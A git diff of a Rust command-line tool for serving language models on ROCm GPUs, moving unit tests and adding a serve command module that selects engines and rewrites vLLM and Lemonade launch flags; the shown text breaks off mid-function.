render_engine_inventory_text_omits_legend_when_configured_default_matches_nothing() { + // A configured default naming an external plugin (or a stale/typo'd + // name) matches zero rows in `engine_inventory()`'s built-ins list — + // the legend would then explain a marker that appears nowhere. + let (root, paths) = test_paths("engine-inventory-unmatched-default"); + let config = RocmCliConfig { + default_engine: Some("totally-unknown-plugin".to_owned()), + ..RocmCliConfig::default() + }; + config.save(&paths).expect("save config"); + + let rendered = render_engine_inventory_text_with_paths(Some(&paths)); + let _ = fs::remove_dir_all(root); + + assert!( + !rendered.contains("legend:"), + "legend must be absent when the configured default matches no built-in engine; got:\n{rendered}" + ); + } + #[test] fn render_engine_inventory_text_honors_configured_default_engine() { // Regression: this renderer used to mark only `default_engine_for_host`, @@ -37789,24 +32105,33 @@ ID_LIKE="suse opensuse" } #[test] - fn render_engine_inventory_text_omits_legend_when_configured_default_matches_nothing() { - // A configured default naming an external plugin (or a stale/typo'd - // name) matches zero rows in `engine_inventory()`'s built-ins list — - // the legend would then explain a marker that appears nowhere. - let (root, paths) = test_paths("engine-inventory-unmatched-default"); + fn examine_treats_a_blank_configured_engine_as_unset() { + // Mirrors `select_serve_engine`'s guard: a config file with + // `default_engine = ""` must fall back to the host preference rather + // than reporting an empty engine name as "effective" and marking none + // of the real ones. + let (root, paths) = test_paths("examine-engine-inventory-blank-configured"); let config = RocmCliConfig { - default_engine: Some("totally-unknown-plugin".to_owned()), + default_engine: Some(String::new()), ..RocmCliConfig::default() }; - config.save(&paths).expect("save config"); + let mut output = String::new(); - let rendered = render_engine_inventory_text_with_paths(Some(&paths)); - let _ = fs::remove_dir_all(root); + append_examine_engine_inventory(&mut output, &paths, &config, "vllm"); assert!( - !rendered.contains("legend:"), - "legend must be absent when the configured default matches no built-in engine; got:\n{rendered}" + output.contains("configured_default_engine: "), + "a blank configured value must read as unset:\n{output}" ); + assert!( + output.contains("effective_default_engine: vllm"), + "a blank configured value must fall back to the host default:\n{output}" + ); + assert!( + output.contains(" * vllm "), + "the '*' marker must land on the host's default, not an empty name:\n{output}" + ); + let _ = fs::remove_dir_all(root); } #[test] @@ -38576,145 +32901,6 @@ ID_LIKE="suse opensuse" // ---------- engine shell prompt shim ---------- - #[test] - fn bash_shim_sources_the_user_rc_and_prefixes_the_prompt() { - let dir = PathBuf::from("/tmp/shim"); - let shim = engine_shell_prompt_shim("/bin/bash", "(rocm:vllm) ", &dir, None) - .expect("bash must be shimmable"); - - // `--rcfile` is what makes bash run our file at all; `-i` keeps it - // interactive even if stdin is not a terminal in some caller. - assert_eq!( - shim.args, - vec![ - "--rcfile".to_owned(), - dir.join("engine-shell.bash").display().to_string(), - "-i".to_owned(), - ] - ); - assert!(shim.envs.is_empty(), "bash needs no extra env"); - - let (path, contents) = shim.files.first().expect("one rc file"); - assert_eq!(path, &dir.join("engine-shell.bash")); - assert!( - contents.contains("$HOME/.bashrc"), - "must restore the user's own rc:\n{contents}" - ); - // bash sources the system file itself even with --rcfile, so sourcing it - // here too would apply it twice. - assert!( - !contents.contains("/etc/bash.bashrc"), - "must not re-source the system rc:\n{contents}" - ); - assert!( - contents.contains("PS1='(rocm:vllm) '\"$PS1\""), - "must prefix rather than replace the prompt:\n{contents}" - ); - } - - #[test] - fn zsh_shim_restores_both_startup_files() { - let dir = PathBuf::from("/tmp/shim"); - let shim = engine_shell_prompt_shim("/usr/bin/zsh", "(rocm:vllm) ", &dir, None) - .expect("zsh must be shimmable"); - - assert!(shim.args.is_empty(), "zsh is redirected via env, not argv"); - assert!( - shim.envs - .contains(&("ZDOTDIR".to_owned(), dir.display().to_string())), - "zsh needs ZDOTDIR pointed at the shim dir: {:?}", - shim.envs - ); - - let names: Vec<_> = shim - .files - .iter() - .map(|(path, _)| path.file_name().unwrap().to_str().unwrap()) - .collect(); - // Redirecting ZDOTDIR hides BOTH of the user's files. Missing `.zshenv` - // would strip their exports — worse than the unmarked prompt this fixes. - assert!( - names.contains(&".zshenv") && names.contains(&".zshrc"), - "both startup files must be restored, got {names:?}" - ); - for (path, contents) in &shim.files { - assert!( - contents.contains("ROCM_CLI_ORIG_ZDOTDIR:-$HOME"), - "{} must fall back to $HOME:\n{contents}", - path.display() - ); - } - let zshrc = shim - .files - .iter() - .find(|(path, _)| path.ends_with(".zshrc")) - .map(|(_, contents)| contents) - .expect(".zshrc present"); - assert!( - zshrc.contains("PROMPT='(rocm:vllm) '$PROMPT"), - "must prefix rather than replace the prompt:\n{zshrc}" - ); - } - - #[test] - fn zsh_shim_passes_through_an_existing_zdotdir() { - let dir = PathBuf::from("/tmp/shim"); - let shim = engine_shell_prompt_shim("zsh", "(rocm:vllm) ", &dir, Some("/home/u/.zsh")) - .expect("zsh must be shimmable"); - assert!( - shim.envs.contains(&( - "ROCM_CLI_ORIG_ZDOTDIR".to_owned(), - "/home/u/.zsh".to_owned() - )), - "a caller's ZDOTDIR must survive so the shim can find their files: {:?}", - shim.envs - ); - - // A blank value is not a location; the shim's $HOME fallback must win. - let blank = engine_shell_prompt_shim("zsh", "(rocm:vllm) ", &dir, Some(" ")) - .expect("zsh must be shimmable"); - assert!( - !blank - .envs - .iter() - .any(|(key, _)| key == "ROCM_CLI_ORIG_ZDOTDIR"), - "a blank ZDOTDIR must not be passed through: {:?}", - blank.envs - ); - } - - #[test] - fn shells_without_a_safe_shim_are_left_alone() { - // Guessing at an unknown shell's startup is worse than the banner: these - // must opt out rather than have a marker forced on them. - let dir = PathBuf::from("/tmp/shim"); - for shell in [ - "/bin/sh", - "/bin/dash", - "/usr/bin/fish", - "cmd", - "powershell", - "pwsh", - "", - ] { - assert!( - engine_shell_prompt_shim(shell, "(rocm:vllm) ", &dir, None).is_none(), - "{shell} should not be shimmed" - ); - } - } - - #[test] - fn shim_matches_on_the_shell_name_not_the_full_path() { - let dir = PathBuf::from("/tmp/shim"); - for shell in ["bash", "/bin/bash", "/usr/local/bin/bash"] { - assert!( - engine_shell_prompt_shim(shell, "(rocm:x) ", &dir, None).is_some(), - "{shell} should resolve to bash" - ); - } - } - #[test] fn examine_engine_inventory_falls_back_to_the_host_engine_when_unconfigured() { // With nothing configured, the reported default must be the engine this @@ -38799,36 +32985,6 @@ ID_LIKE="suse opensuse" let _ = fs::remove_dir_all(root); } - #[test] - fn examine_treats_a_blank_configured_engine_as_unset() { - // Mirrors `select_serve_engine`'s guard: a config file with - // `default_engine = ""` must fall back to the host preference rather - // than reporting an empty engine name as "effective" and marking none - // of the real ones. - let (root, paths) = test_paths("examine-engine-inventory-blank-configured"); - let config = RocmCliConfig { - default_engine: Some(String::new()), - ..RocmCliConfig::default() - }; - let mut output = String::new(); - - append_examine_engine_inventory(&mut output, &paths, &config, "vllm"); - - assert!( - output.contains("configured_default_engine: "), - "a blank configured value must read as unset:\n{output}" - ); - assert!( - output.contains("effective_default_engine: vllm"), - "a blank configured value must fall back to the host default:\n{output}" - ); - assert!( - output.contains(" * vllm "), - "the '*' marker must land on the host's default, not an empty name:\n{output}" - ); - let _ = fs::remove_dir_all(root); - } - #[test] fn runtime_update_source_uses_active_runtime_and_requires_selector_when_ambiguous() -> Result<()> { @@ -38942,7 +33098,7 @@ ID_LIKE="suse opensuse" ); } - fn write_test_pip_runtime( + pub(crate) fn write_test_pip_runtime( paths: &AppPaths, runtime_key: &str, runtime_id: &str, @@ -39032,7 +33188,7 @@ ID_LIKE="suse opensuse" Ok(manifest) } - fn test_runtime_manifest_for_update( + pub(crate) fn test_runtime_manifest_for_update( runtime_key: &str, runtime_id: &str, family: &str, @@ -39181,7 +33337,7 @@ ID_LIKE="suse opensuse" let _ = fs::remove_dir_all(root); } - fn test_paths(name: &str) -> (PathBuf, AppPaths) { + pub(crate) fn test_paths(name: &str) -> (PathBuf, AppPaths) { let root = PathBuf::from(env!("CARGO_MANIFEST_DIR")) .join("..") .join("..") @@ -39318,104 +33474,6 @@ ID_LIKE="suse opensuse" let _ = fs::remove_dir_all(&root); } - /// Persist a live-looking managed record claiming `gpu` — the same shape a - /// real launch writes, with the current process id as the supervisor so the - /// liveness refresh in `load_managed_services` keeps it "starting" (and thus - /// counted by `busy_gpu_indices`). - fn write_claiming_record(paths: &AppPaths, service_id: &str, port: u16, gpu: &[u32]) { - let mut record = ManagedServiceRecord::new( - paths, - service_id, - "vllm", - "qwen", - "Qwen/Qwen3.5", - "127.0.0.1", - port, - "managed", - std::process::id(), - Some("therock-release".to_owned()), - None, - Some("gpu_required".to_owned()), - ); - record.status = "starting".to_owned(); - record.gpu_indices = gpu.to_vec(); - record.write().expect("write claiming record"); - } - - #[test] - fn launch_lock_makes_gpu_select_and_claim_atomic() { - // Regression for the serve read-select-launch race: the busy-GPU read and - // the claiming record write must happen under one lock, or two concurrent - // `--gpu auto` serves both read the same GPU as free and land on it. - // - // The test does NOT take the lock itself — that would only prove - // `FileLock` excludes (already covered by - // `file_lock_serializes_concurrent_holders` in rocm-core). It calls - // `select_gpu_indices_under_launch_lock`, the production helper `serve()` - // uses, whose contract is that it returns the guard *it* acquired together - // with the selection; the test holds that guard across the claim exactly - // as `serve()` holds it until `spawn_managed_engine_child` persists the - // record. Delete the `FileLock::acquire` from that helper and this test - // goes red: both threads then select GPU 0. - // - // Determinism: the barrier releases both threads together and each sleeps - // between select and claim, so an unlocked helper double-books GPU 0 - // regardless of scheduling skew, while the locked helper forces the second - // thread to observe the first thread's claim. - let (root, paths) = test_paths("launch-lock-atomic-claim"); - paths.ensure().expect("prepare paths"); - let detected = Some(2_usize); - - let barrier = std::sync::Barrier::new(2); - let selections = std::thread::scope(|scope| { - let handles: Vec<_> = [("svc-race-a", 21001_u16), ("svc-race-b", 21002_u16)] - .into_iter() - .map(|(service_id, port)| { - let paths = &paths; - let barrier = &barrier; - scope.spawn(move || { - barrier.wait(); - // The exact call `serve()` makes: the helper acquires the - // launch lock and selects under it, handing the guard back. - // `None` visibility keeps selection mask-unaware for the - // test host; `pinned` `None` + `cpu_only` false is the - // `--gpu auto` path that reads live busy-GPU state. - let (gpu, lock) = select_gpu_indices_under_launch_lock( - paths, - false, - None, - || detected, - None, - None, - ) - .expect("auto GPU selection under launch lock"); - // Widen the select→claim window so an unlocked helper - // deterministically double-books GPU 0; under the lock the - // second thread cannot enter until we claim. - std::thread::sleep(Duration::from_millis(50)); - write_claiming_record(paths, service_id, port, &gpu); - drop(lock); - gpu - }) - }) - .collect(); - handles - .into_iter() - .map(|handle| handle.join().expect("selection thread joins")) - .collect::>() - }); - - let mut picked: Vec = selections.into_iter().flatten().collect(); - picked.sort_unstable(); - assert_eq!( - picked, - vec![0, 1], - "serialized select-then-claim must hand out distinct GPUs, got {picked:?}" - ); - - let _ = fs::remove_dir_all(&root); - } - // ---- Phase 9: reroute dispatch (bare `rocm` + interactive `rocm chat`) ---- // // The interactive branches require a real TTY (`interactive_terminal()`), @@ -39423,7 +33481,6 @@ ID_LIKE="suse opensuse" // tests instead PROVE the dispatch TARGET changed: the two interactive // handlers now call `dash::run_chat` and no longer call `tui::run`. We read // this source file at test time and assert on the handler bodies. - fn main_rs_source() -> String { let path = PathBuf::from(env!("CARGO_MANIFEST_DIR")) .join("src") diff --git a/apps/rocm/src/serve_cmd.rs b/apps/rocm/src/serve_cmd.rs new file mode 100644 index 000000000..87ce316de --- /dev/null +++ b/apps/rocm/src/serve_cmd.rs @@ -0,0 +1,1682 @@ +// Copyright © Advanced Micro Devices, Inc., or its affiliates. +// +// SPDX-License-Identifier: MIT + +//! `rocm serve` command handler and engine-recipe overrides. +//! +//! Mechanically relocated from `main.rs` with no behavior change — the +//! `dispatch()` call site stays byte-identical (`serve(ServeArgs { .. })`, +//! re-imported via `use crate::serve_cmd::{ServeArgs, select_serve_engine, serve};` +//! — `select_serve_engine` rides along for `assess_model_for_host`, not dispatch). +//! `Cli` is not referenced from this file; `DevicePolicyArg` (part of the clap arg tree) +//! is, via `use crate::DevicePolicyArg`. +//! +//! Several `serve()`-only helpers stay in `main.rs` and are re-imported here +//! rather than moving, for two different reasons. The managed-service- +//! spawning tail (`start_managed_service`, `run_attached_service`, +//! `spawn_managed_engine_child`) is entangled with other still-crate-root +//! launch helpers (`stream_attached_logs`, `record_cli_audit_event`, and +//! friends) that have not been relocated yet, so moving it alone would just +//! relocate the `use` statements, not reduce the coupling. `collect_serve_notes`, +//! `validate_bind_host`, `resolve_endpoint_auth`, +//! `ensure_public_bind_engine_supported`, `validate_pinned_gpu_index`, and +//! `print_managed_launch_plain` have no such entanglement and no non-test +//! caller left in `main.rs` — they stayed to keep this extraction a minimal, +//! easy-to-review diff rather than a mixed move-and-reshuffle pass; a later +//! pass can relocate them along with their test module. + +use std::fmt::Write as _; + +use anyhow::{Result, bail}; +use rocm_core::{ + AppPaths, ModelRecipeRecord, RocmCliConfig, default_engine_for_platform, + detect_host_gpu_summary, generate_service_id, preferred_serve_engine_for_host_gpu_summary, + resolve_model_recipe, +}; +use rocm_engine_protocol::{ + DevicePolicy, ENGINE_RECIPE_CONTRACT_VERSION, EngineMethod, EngineRecipeEndpointHint, + EngineRecipeHint, EngineRecipeUnsupportedCombinationHint, GpuSelection, ResolveModelRequest, + ResolveModelResponse, +}; + +use crate::DevicePolicyArg; +use crate::endpoint_keys; +use crate::engines_cmd::{engine_manages_own_runtime, ensure_self_managed_engine_ready}; +use crate::serve_summary; +use crate::{ + cli_progress, collect_serve_notes, detect_gpu_count, device_policy_name, + drop_orphaned_endpoint_key_on_already_running, engine_request, + ensure_background_helper_running_quiet, ensure_public_bind_engine_supported, gpu_vram_usage, + parse_device_policy, parse_gpu_selection, print_managed_launch_plain, resolve_endpoint_auth, + resolve_engine_selection, run_attached_service, select_gpu_indices_under_launch_lock, + serve_gpu_low_memory_warning, start_managed_service, validate_bind_host, + validate_engine_selection_runtime, validate_pinned_gpu_index, +}; + +#[derive(Debug, Clone, Eq, PartialEq)] +pub(crate) struct ServeEngineSelection { + pub(crate) engine: String, + pub(crate) source: &'static str, +} + +pub(crate) fn select_serve_engine( + explicit_engine: Option<&str>, + configured_default: Option<&str>, + recipe: Option<&ModelRecipeRecord>, + host_gpu_summary: Option<&rocm_core::HostGpuSummary>, +) -> ServeEngineSelection { + if let Some(engine) = explicit_engine.filter(|value| !value.trim().is_empty()) { + return ServeEngineSelection { + engine: engine.to_owned(), + source: "explicit --engine", + }; + } + + if let Some(engine) = configured_default.filter(|value| !value.trim().is_empty()) { + return ServeEngineSelection { + engine: engine.to_owned(), + source: "configured default_engine", + }; + } + + if let Some(engine) = host_gpu_summary.and_then(preferred_serve_engine_for_host_gpu_summary) { + // Only honor the GPU preference when the model's recipe can actually run on + // that engine. A recipe that exists but does not support the preferred engine + // (for example a GGUF model that only Lemonade can serve) must fall through to + // its own preferred engine instead of being forced onto an incompatible engine. + let recipe_supports_preferred = + recipe.is_none_or(|recipe| model_recipe_supports_engine(recipe, engine)); + if recipe_supports_preferred { + return ServeEngineSelection { + engine: engine.to_owned(), + source: "detected ROCm GPU family prefers vLLM", + }; + } + } + + if let Some(engine) = recipe + .and_then(|recipe| recipe.preferred_engines.first()) + .filter(|value| !value.trim().is_empty()) + { + return ServeEngineSelection { + engine: engine.to_owned(), + source: "recipe preferred engine; pass --engine to override; no automatic fallback", + }; + } + + ServeEngineSelection { + engine: default_engine_for_platform().to_owned(), + source: "platform default", + } +} + +fn model_recipe_supports_engine(recipe: &ModelRecipeRecord, engine: &str) -> bool { + recipe + .preferred_engines + .iter() + .any(|candidate| candidate.eq_ignore_ascii_case(engine)) + || recipe + .engine_recipes + .iter() + .any(|candidate| candidate.engine.eq_ignore_ascii_case(engine)) +} + +fn serve_model_ref_for_engine( + model: &str, + recipe: Option<&ModelRecipeRecord>, + selected_engine: &str, +) -> String { + let Some(recipe) = + recipe.filter(|recipe| model_recipe_supports_engine(recipe, selected_engine)) + else { + return model.to_owned(); + }; + if let Some(override_id) = recipe + .engine_recipes + .iter() + .find(|engine_recipe| engine_recipe.engine.eq_ignore_ascii_case(selected_engine)) + .and_then(|engine_recipe| engine_recipe.model_id_override.as_deref()) + .filter(|value| !value.trim().is_empty()) + { + return override_id.to_owned(); + } + recipe.canonical_model_id.clone() +} + +fn serve_engine_selection_line(selection: &ServeEngineSelection) -> String { + format!(" engine_selection: {}", selection.source) +} + +fn render_serve_engine_recipe_lines(engine_recipe: &EngineRecipeHint) -> String { + let mut output = String::new(); + let _ = writeln!( + output, + " engine_recipe_contract: {}", + engine_recipe.contract_version + ); + let _ = writeln!( + output, + " engine_recipe_policy: selected-engine required_flags are applied at launch; parser/endpoint metadata is forwarded to the adapter" + ); + let _ = writeln!(output, " engine_recipe_engine: {}", engine_recipe.engine); + if !engine_recipe.required_flags.is_empty() { + let _ = writeln!( + output, + " engine_recipe_required_flags: {}", + engine_recipe.required_flags.join(" ") + ); + } + output +} + +fn protocol_engine_recipe_hint( + recipe: &ModelRecipeRecord, + engine: &str, +) -> Option { + recipe + .engine_recipes + .iter() + .find(|engine_recipe| engine_recipe.engine == engine) + .map(|engine_recipe| EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: engine_recipe.engine.clone(), + required_flags: engine_recipe.required_flags.clone(), + parser_settings: engine_recipe.parser_settings.clone(), + preferred_endpoint: engine_recipe.preferred_endpoint.as_ref().map(|endpoint| { + EngineRecipeEndpointHint { + endpoint_mode: endpoint.endpoint_mode.clone(), + settings: endpoint.settings.clone(), + } + }), + unsupported_combinations: engine_recipe + .unsupported_combinations + .iter() + .map(|combination| EngineRecipeUnsupportedCombinationHint { + combination: combination.combination.clone(), + reason: combination.reason.clone(), + }) + .collect(), + notes: engine_recipe.notes.clone(), + }) +} + +/// Applies an explicit `--tool-call-parser` override to a vLLM engine recipe hint. +/// +/// The TUI chat tab always attaches tool definitions to non-streaming chat +/// requests (`tool_choice: "auto"`). vLLM rejects those with HTTP 400 unless it was +/// started with `--enable-auto-tool-choice` *and* a matching `--tool-call-parser`. +/// The correct parser is model-specific and vLLM does not auto-detect it, so it is +/// never guessed from the model ref: it comes either from authored catalog recipe +/// metadata (already carried in `required_flags`) or from the explicit +/// `--tool-call-parser` serve flag, which this applies. +/// +/// Only vLLM is affected. When an override is supplied it wins over any +/// recipe-authored parser (a single `--tool-call-parser`, no duplication) and a +/// minimal hint is synthesized when none exists (arbitrary HF repos, or a catalog +/// model forced onto a non-preferred engine). With no override the hint passes +/// through unchanged. +fn engine_recipe_with_tool_call_override( + engine: &str, + hint: Option, + tool_call_parser: Option<&str>, +) -> Option { + if !engine.eq_ignore_ascii_case("vllm") { + return hint; + } + let Some(parser) = tool_call_parser + .map(str::trim) + .filter(|value| !value.is_empty()) + else { + return hint; + }; + let mut hint = hint.unwrap_or_else(|| EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: engine.to_owned(), + ..EngineRecipeHint::default() + }); + set_vllm_tool_call_parser(&mut hint.required_flags, parser); + Some(hint) +} + +/// Sampling defaults a `rocm serve` invocation can push into a vLLM launch. +#[derive(Debug, Clone, Copy, Default, PartialEq)] +struct ServeGenerationDefaults { + temperature: Option, + top_p: Option, + max_tokens: Option, +} + +impl ServeGenerationDefaults { + const fn is_empty(&self) -> bool { + self.temperature.is_none() && self.top_p.is_none() && self.max_tokens.is_none() + } +} + +/// Applies `rocm serve` generation defaults (`--temperature`/`--top-p`/`--max-tokens`) +/// to the selected engine's launch recipe. +/// +/// vLLM `serve` has no raw `--temperature`/`--top-p` flags; `--override-generation-config` +/// is the supported way to set server-wide sampling defaults, so `--max-tokens` is +/// mapped onto vLLM's `max_new_tokens` output cap. Only supplied values are written, +/// and any values already carried by an authored recipe's +/// `--override-generation-config` are preserved (the CLI-supplied keys win). +/// +/// Lemonade's llama.cpp backend accepts the equivalent `--temperature`, `--top-p`, +/// and `--n-predict` launch flags. A minimal hint is synthesized when none exists. +/// With no defaults supplied the hint passes through unchanged. +fn engine_recipe_with_generation_defaults( + engine: &str, + hint: Option, + defaults: ServeGenerationDefaults, +) -> Result> { + if defaults.is_empty() { + return Ok(hint); + } + let mut hint = hint.unwrap_or_else(|| EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: engine.to_owned(), + ..EngineRecipeHint::default() + }); + if engine.eq_ignore_ascii_case("vllm") { + let mut overrides = serde_json::Map::new(); + if let Some(temperature) = defaults.temperature { + overrides.insert("temperature".to_owned(), serde_json::json!(temperature)); + } + if let Some(top_p) = defaults.top_p { + overrides.insert("top_p".to_owned(), serde_json::json!(top_p)); + } + if let Some(max_tokens) = defaults.max_tokens { + overrides.insert("max_new_tokens".to_owned(), serde_json::json!(max_tokens)); + } + set_vllm_override_generation_config(&mut hint.required_flags, &overrides); + } else if engine.eq_ignore_ascii_case("lemonade") { + set_lemonade_generation_defaults(&mut hint.required_flags, defaults); + } else { + bail!( + "generation defaults are not supported by engine `{engine}`; omit --temperature/--top-p/--max-tokens or select vllm/lemonade" + ); + } + Ok(Some(hint)) +} + +fn set_lemonade_generation_defaults(flags: &mut Vec, defaults: ServeGenerationDefaults) { + // Only touch a flag pair when the caller actually supplied that control — + // an unset field must leave any authored recipe value in place rather than + // deleting it, mirroring the vLLM merge semantics in + // `set_vllm_override_generation_config`. + for (name, value) in [ + ( + "--temperature", + defaults.temperature.map(|value| value.to_string()), + ), + ("--top-p", defaults.top_p.map(|value| value.to_string())), + ( + "--n-predict", + defaults.max_tokens.map(|value| value.to_string()), + ), + ] { + let Some(value) = value else { + continue; + }; + let mut rewritten = Vec::with_capacity(flags.len() + 2); + let mut skip_value = false; + for flag in std::mem::take(flags) { + if skip_value { + skip_value = false; + continue; + } + if flag == name { + skip_value = true; + } else { + rewritten.push(flag); + } + } + rewritten.extend([name.to_owned(), value]); + *flags = rewritten; + } +} + +/// Rewrites `flags` so vLLM's `--override-generation-config` carries exactly one +/// merged JSON object: any existing `--override-generation-config ` pair is +/// removed, its keys are used as a base, and `overrides` are layered on top (CLI +/// values win). Emits a single flag pair with the merged, stably-ordered config. +fn set_vllm_override_generation_config( + flags: &mut Vec, + overrides: &serde_json::Map, +) { + let existing = std::mem::take(flags); + let mut rewritten: Vec = Vec::with_capacity(existing.len() + 2); + let mut merged = serde_json::Map::new(); + let mut take_value = false; + for flag in existing { + if take_value { + take_value = false; + if let Ok(serde_json::Value::Object(existing_config)) = + serde_json::from_str::(&flag) + { + for (key, value) in existing_config { + merged.insert(key, value); + } + } else { + eprintln!( + "warning: existing --override-generation-config value is not valid JSON; discarding it" + ); + } + continue; + } + if flag == "--override-generation-config" { + take_value = true; + continue; + } + rewritten.push(flag); + } + for (key, value) in overrides { + merged.insert(key.clone(), value.clone()); + } + rewritten.push("--override-generation-config".to_owned()); + rewritten.push(serde_json::Value::Object(merged).to_string()); + *flags = rewritten; +} + +/// Rewrites `flags` so vLLM tool calling uses exactly `parser`: drops any existing +/// `--tool-call-parser ` pair, ensures `--enable-auto-tool-choice` is +/// present, then appends the new parser flag. +fn set_vllm_tool_call_parser(flags: &mut Vec, parser: &str) { + let existing = std::mem::take(flags); + let mut rewritten: Vec = Vec::with_capacity(existing.len() + 3); + let mut skip_value = false; + for flag in existing { + if skip_value { + // Drop the value that followed the removed `--tool-call-parser`. + skip_value = false; + continue; + } + if flag == "--tool-call-parser" { + skip_value = true; + continue; + } + rewritten.push(flag); + } + if !rewritten + .iter() + .any(|flag| flag == "--enable-auto-tool-choice") + { + rewritten.push("--enable-auto-tool-choice".to_owned()); + } + rewritten.push("--tool-call-parser".to_owned()); + rewritten.push(parser.to_owned()); + *flags = rewritten; +} + +/// Applies an explicit `--gpu-memory-utilization` to the vLLM engine recipe. +/// +/// rocm-cli intentionally ships no default for this: vLLM sizes its KV cache as +/// a fraction of the device's TOTAL VRAM, and any number rocm-cli picked would +/// silently override upstream's and drift from it. So the flag is passed through +/// only when the user asked for one, via `required_flags` (the same channel the +/// `--tool-call-parser` override uses — no protocol change needed). +/// +/// Only vLLM is affected. An explicit value wins over any recipe-authored one, +/// and a minimal hint is synthesized when none exists. +fn engine_recipe_with_gpu_memory_utilization_override( + engine: &str, + hint: Option, + gpu_memory_utilization: Option, +) -> Option { + if !engine.eq_ignore_ascii_case("vllm") { + return hint; + } + let Some(value) = gpu_memory_utilization else { + return hint; + }; + let mut hint = hint.unwrap_or_else(|| EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: engine.to_owned(), + ..EngineRecipeHint::default() + }); + set_vllm_gpu_memory_utilization(&mut hint.required_flags, value); + Some(hint) +} + +/// Rewrites `flags` so vLLM receives exactly one `--gpu-memory-utilization +/// ` pair: drops any existing pair, then appends the new one. +fn set_vllm_gpu_memory_utilization(flags: &mut Vec, value: f64) { + let existing = std::mem::take(flags); + let mut rewritten: Vec = Vec::with_capacity(existing.len() + 2); + let mut skip_value = false; + for flag in existing { + if skip_value { + // Drop the value that followed the removed flag. + skip_value = false; + continue; + } + if flag == "--gpu-memory-utilization" { + skip_value = true; + continue; + } + rewritten.push(flag); + } + rewritten.push("--gpu-memory-utilization".to_owned()); + rewritten.push(format!("{value}")); + *flags = rewritten; +} + +/// Parse `rocm serve --gpu-memory-utilization`. Unlike the env-var overrides +/// elsewhere in this file, an explicit CLI value is never silently ignored: a +/// user who types a bad fraction is told so. +fn parse_gpu_memory_utilization(value: Option<&str>) -> Result> { + let Some(raw) = value else { + return Ok(None); + }; + let trimmed = raw.trim(); + let parsed: f64 = trimmed.parse().map_err(|_| { + anyhow::anyhow!( + "--gpu-memory-utilization expects a fraction greater than 0 and at most 1 \ + (e.g. 0.5); got `{trimmed}`" + ) + })?; + if !parsed.is_finite() || parsed <= 0.0 || parsed > 1.0 { + bail!( + "--gpu-memory-utilization must be greater than 0 and at most 1 (a fraction of \ + the GPU's TOTAL VRAM, e.g. 0.5); got `{trimmed}`" + ); + } + Ok(Some(parsed)) +} + +/// Whether the resolved engine recipe launches vLLM with tool calling enabled. +fn engine_recipe_enables_tool_choice(hint: Option<&EngineRecipeHint>) -> bool { + hint.is_some_and(|hint| { + hint.required_flags + .iter() + .any(|flag| flag == "--enable-auto-tool-choice") + }) +} + +/// Parsed `rocm serve` arguments. Grouped into a struct to keep the dispatcher +/// and `serve()` readable now that the verb carries verbose/smoke-test controls. +pub(crate) struct ServeArgs { + pub(crate) model: String, + pub(crate) engine: Option, + pub(crate) device: Option, + pub(crate) gpu: Option, + pub(crate) runtime_id: Option, + pub(crate) env_id: Option, + pub(crate) host: String, + pub(crate) port: u16, + pub(crate) foreground: bool, + pub(crate) managed: bool, + pub(crate) verbose: bool, + pub(crate) no_smoke_test: bool, + pub(crate) allow_public_bind: bool, + pub(crate) require_api_key: bool, + pub(crate) tool_call_parser: Option, + pub(crate) gpu_memory_utilization: Option, + pub(crate) temperature: Option, + pub(crate) top_p: Option, + pub(crate) max_tokens: Option, + pub(crate) api_key: Option, +} + +pub(crate) fn serve(args: ServeArgs) -> Result<()> { + let ServeArgs { + model, + engine, + device, + gpu, + runtime_id, + env_id, + host, + port, + foreground, + managed, + verbose, + no_smoke_test, + allow_public_bind, + require_api_key, + tool_call_parser, + gpu_memory_utilization, + temperature, + top_p, + max_tokens, + api_key, + } = args; + let _ = managed; // background is now the default; --managed is accepted as an explicit synonym. + validate_bind_host(&host, allow_public_bind)?; + // Loopback stays credential-free; a public bind must be authenticated. Resolve + // (or generate) the endpoint key now so every downstream path — engine spawn, + // readiness probe, smoke test, and the client-config we print — shares one value. + // The `--api-key` flag wins; otherwise fall back to `ROCM_SERVE_API_KEY` (read + // here rather than via clap's `env` so it works without clap's `env` feature). + let supplied_key = api_key.or_else(|| { + std::env::var("ROCM_SERVE_API_KEY") + .ok() + .filter(|value| !value.trim().is_empty()) + }); + let endpoint_auth = resolve_endpoint_auth(&host, supplied_key.as_deref(), require_api_key)?; + let paths = AppPaths::discover()?; + let mut config = RocmCliConfig::load(&paths)?; + // Host GPU detection can involve sysfs/WSL probing, so only run it when engine + // selection would actually consult it: no explicit `--engine` and no non-empty + // configured `default_engine`. + let host_gpu_summary = if engine + .as_deref() + .is_some_and(|value| !value.trim().is_empty()) + || config + .default_engine + .as_deref() + .is_some_and(|value| !value.trim().is_empty()) + { + None + } else { + Some(detect_host_gpu_summary(Some(&paths))) + }; + let shared_recipe = resolve_model_recipe(&model)?; + let serve_engine = select_serve_engine( + engine.as_deref(), + config.default_engine.as_deref(), + shared_recipe.as_ref(), + host_gpu_summary.as_ref(), + ); + let selected_engine = serve_engine.engine.clone(); + // Fail closed: a public bind must be authenticated, but Windows managed + // Lemonade cannot receive the key (see `ensure_public_bind_engine_supported`), + // so refuse rather than launch an open public server. + ensure_public_bind_engine_supported(&selected_engine, endpoint_auth.is_some(), cfg!(windows))?; + let engine_model_ref = + serve_model_ref_for_engine(&model, shared_recipe.as_ref(), &selected_engine); + let recipe_hint = shared_recipe + .as_ref() + .filter(|recipe| model_recipe_supports_engine(recipe, &selected_engine)) + .and_then(|recipe| protocol_engine_recipe_hint(recipe, &selected_engine)); + // vLLM rejects the TUI chat tab's tool-bearing requests with HTTP 400 unless it + // is launched with `--enable-auto-tool-choice`/`--tool-call-parser`. The parser + // is model-specific and vLLM does not auto-detect it, so it is never guessed: it + // comes from authored catalog recipe metadata or an explicit `--tool-call-parser` + // override, applied here for vLLM only. + let engine_serves_vllm = selected_engine.eq_ignore_ascii_case("vllm"); + let engine_recipe = engine_recipe_with_tool_call_override( + &selected_engine, + recipe_hint, + tool_call_parser.as_deref(), + ); + // Validated before anything is launched so a typo fails immediately rather + // than surfacing as a vLLM argparse error deep in the engine log. + let gpu_memory_utilization = parse_gpu_memory_utilization(gpu_memory_utilization.as_deref())?; + let engine_recipe = engine_recipe_with_gpu_memory_utilization_override( + 